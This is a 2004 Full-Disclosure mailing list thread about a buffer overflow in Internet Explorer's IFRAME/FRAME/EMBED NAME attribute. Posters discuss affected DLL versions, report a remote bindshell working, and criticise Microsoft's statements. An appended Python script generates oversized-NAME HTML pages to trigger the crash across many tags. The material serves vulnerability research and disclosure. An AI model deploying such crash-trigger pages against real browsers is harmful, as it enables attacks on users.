Message-ID: <418F2783.4090301@schimmetje.com>
From: patryn at schimmetje.com (patryn)
Subject: MSIE <IFRAME> and <FRAME> tag NAME property bufferoverflow PoC exploit (was: python does mangleme (with IE bugs!))
Berend-Jan Wever wrote:
> I hope they fixed it by accident, seeing what the other option would
> imply.
Certainly puts all that jive they've been spewing to the press in a
different perspective.
"Microsoft has begun to investigate the Iframe vulnerability and has not
been made aware of any program designed to exploit the flaw." (You'd
think they'd monitor the lists. - p)
"Upon completion of this investigation, Microsoft will take the
appropriate action to protect our customers, which may include providing
a fix through our monthly release process or an out-of-cycle security
update, depending on customer needs"
"Microsoft is concerned that this new report of a vulnerability in
Internet Explorer was not disclosed responsibly, potentially putting
computer users at risk"
http://news.com.com/Exploit+code+makes+IE+flaw+more+dangerous/2100-1002_3-5439370.html
But then again, who doesn't like to bash Redmond? I'm curious what the
"investigation" is turning up, though.
patryn
Berend-Jan Wever wrote:
> Hmmm... MSDN DHTML Reference mentions 6 different flavors of the NAME
> property:
> 1) For a lot of tags like A, APPLET, IMG, INPUT, etc... this includes
> EMBED
> 2) FRAME, FRAMESET, IFRAME
> 3) META
> 4) namespace
> 5) PARAM
> 6) window
>
> I figured all the tags mentioned under 2 were affected and the rest
> wasn't. Now I hear <EMBED> is also working? Somebody might wanna go
> through each and every tag to see which are affected and which aren't.
>
> SHDOCVW.DLL versions 6.0.2800.1400 and 6.0.2800.1584 are known to be
> vulnerable.
> SHDOCVW.DLL version 6.00.2900.2518 seems to be immune to the BoF
> (ships with XP PRO SP2).
>
> The immune version got me wondering if they knew about the bug? If
> not, did they expect the code could be buggy and just rewrote it to be
> sure it was safe for SP2? Or was there just a code rewrite or another
> reason why the bug got silently fixed...? I hope they fixed it by
> accident, seeing what the other option would imply.
>
> Cheers,
> SkyLined
>
> ----- Original Message -----
> From: "Menashe Eliezer" <menashe@...jan.com>
> To: "Berend-Jan Wever" <skylined@...p.tudelft.nl>;
> <full-disclosure@...ts.netsys.com>
> Sent: Sunday, November 07, 2004 23:21
> Subject: RE: [Full-Disclosure] MSIE <IFRAME> and <FRAME> tag NAME
> property bufferoverflow PoC exploit (was: python does mangleme (with IE
> bugs!))
>
>> The published exploit is working also with the <EMBED> tag, and not just
>> with the <IFRAME> and the <FRAME> tags.
>> Finjan's advisory can be found at:
>> http://www.finjan.com/SecurityLab/AttackandExploitReports/alert_show.asp?attack_release_id=114
>>
>> ==
>> Regards,
>> Menashe Eliezer
>> Senior application security architect
>> Malicious Code Research Center
>> Finjan Software
>> http://www.finjan.com/mcrc
>>
>> Prevention is the best cure!
>>
>> -----Original Message-----
>> From: morning_wood [mailto:se_cur_ity@...mail.com]
>> Sent: Tuesday, November 02, 2004 3:44 PM
>> To: Berend-Jan Wever; full-disclosure@...ts.netsys.com;
>> bugtraq@...urityfocus.com
>> Subject: Re: [Full-Disclosure] MSIE <IFRAME> and <FRAME> tag NAME
>> property bufferoverflow PoC exploit (was: python does mangleme (with IE
>> bugs!))
>>
>> Bindshell success (HTML run from local), connect from remote success...
>> this is NASTY.
>> If the shellcode is modified this will do reverse or exe drop, I assume....
>>
>> Good work,
>>
>> Donnie Werner
>>
>>_______________________________________________
>>Full-Disclosure - We believe in it.
>>Charter: http://lists.netsys.com/full-disclosure-charter.html
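The survey SkyLined asks for above (checking every NAME-bearing tag from the MSDN list, not just IFRAME, FRAME and the EMBED case Finjan reports) needs one test page per tag and per NAME length. The generator below is an added example written for this page; it is not code from the thread, from mangleme, or from any of the posters. The length ladder and the use of about:blank as the src value are assumptions, since the thread gives neither a triggering length nor the original PoC. It is meant to be run against a throwaway VM carrying one of the SHDOCVW.DLL versions named above, opening one generated file at a time so that a crash of iexplore.exe pins down the tag and the length.

```python
"""Generate one IE NAME-attribute stress page per tag and per length.

Added example for the 'go through each and every tag' survey proposed
in the thread; not the thread's PoC. Assumptions: the trigger is simply
an oversized NAME value, and the length ladder below brackets it.
"""
import os

# Tag groups as listed from the MSDN DHTML reference in the thread.
# Which of these are actually affected is the open question; this file
# only produces the test cases. 'namespace' and 'window' are not tags
# and are left out.
TAG_TEMPLATES = {
    # group 2 (FRAME/IFRAME confirmed in the thread) plus EMBED (Finjan)
    "IFRAME": '<iframe name="{name}" src="about:blank"></iframe>',
    "FRAME":  '<frame name="{name}" src="about:blank">',
    "EMBED":  '<embed name="{name}" src="about:blank">',
    # group 1, 3 and 5: status unknown per the thread
    "A":      '<a name="{name}">anchor</a>',
    "APPLET": '<applet name="{name}" code="x.class" width="1" height="1"></applet>',
    "IMG":    '<img name="{name}" src="about:blank" width="1" height="1">',
    "INPUT":  '<input name="{name}" type="hidden" value="x">',
    "META":   '<meta name="{name}" content="x">',
    "PARAM":  '<object><param name="{name}" value="x"></object>',
}

# Assumed ladder: the thread does not state the length that overflows.
LENGTHS = (256, 1024, 4096, 16384)


def build_test_page(tag, length, fill="A"):
    """Return a complete HTML document exercising <TAG NAME=...> with a
    NAME value of `length` bytes.

    FRAME is only valid inside a FRAMESET (no BODY) and META belongs in
    HEAD, so those two get their own document shape; every other tag is
    dropped into BODY.
    """
    tag = tag.upper()
    if tag not in TAG_TEMPLATES:
        raise ValueError(f"no template for tag {tag}")
    name = fill * length
    element = TAG_TEMPLATES[tag].format(name=name)
    title = f"<title>{tag} NAME length {length}</title>"
    if tag == "FRAME":
        return (f"<html><head>{title}</head>"
                f'<frameset cols="*">{element}</frameset></html>')
    if tag == "META":
        return f"<html><head>{title}{element}</head><body></body></html>"
    return f"<html><head>{title}</head><body>{element}</body></html>"


def build_suite(lengths=LENGTHS):
    """Map (tag, length) -> HTML for every tag in TAG_TEMPLATES."""
    return {(tag, n): build_test_page(tag, n)
            for tag in TAG_TEMPLATES for n in lengths}


def write_suite(directory, lengths=LENGTHS):
    """Write one file per case plus an index.html of plain links (the
    index itself embeds no test element, so it is safe to open first).
    Returns the list of paths written."""
    os.makedirs(directory, exist_ok=True)
    paths, links = [], []
    for (tag, n), html in build_suite(lengths).items():
        fname = f"{tag.lower()}_{n}.html"
        path = os.path.join(directory, fname)
        with open(path, "w", encoding="ascii") as fh:
            fh.write(html)
        paths.append(path)
        links.append(f'<li><a href="{fname}">{tag} / {n}</a></li>')
    index = os.path.join(directory, "index.html")
    with open(index, "w", encoding="ascii") as fh:
        fh.write("<html><body><ul>" + "".join(links) + "</ul></body></html>")
    paths.append(index)
    return paths


if __name__ == "__main__":
    import sys
    out_dir = sys.argv[1] if len(sys.argv) > 1 else "name_tests"
    for p in write_suite(out_dir):
        print(p)
```

Run it on the analysis host, copy the output directory to the test VM, and open the cases from index.html one at a time rather than loading them all into one page; a single document holding every tag would tell you that something crashed but not which tag or which length did it.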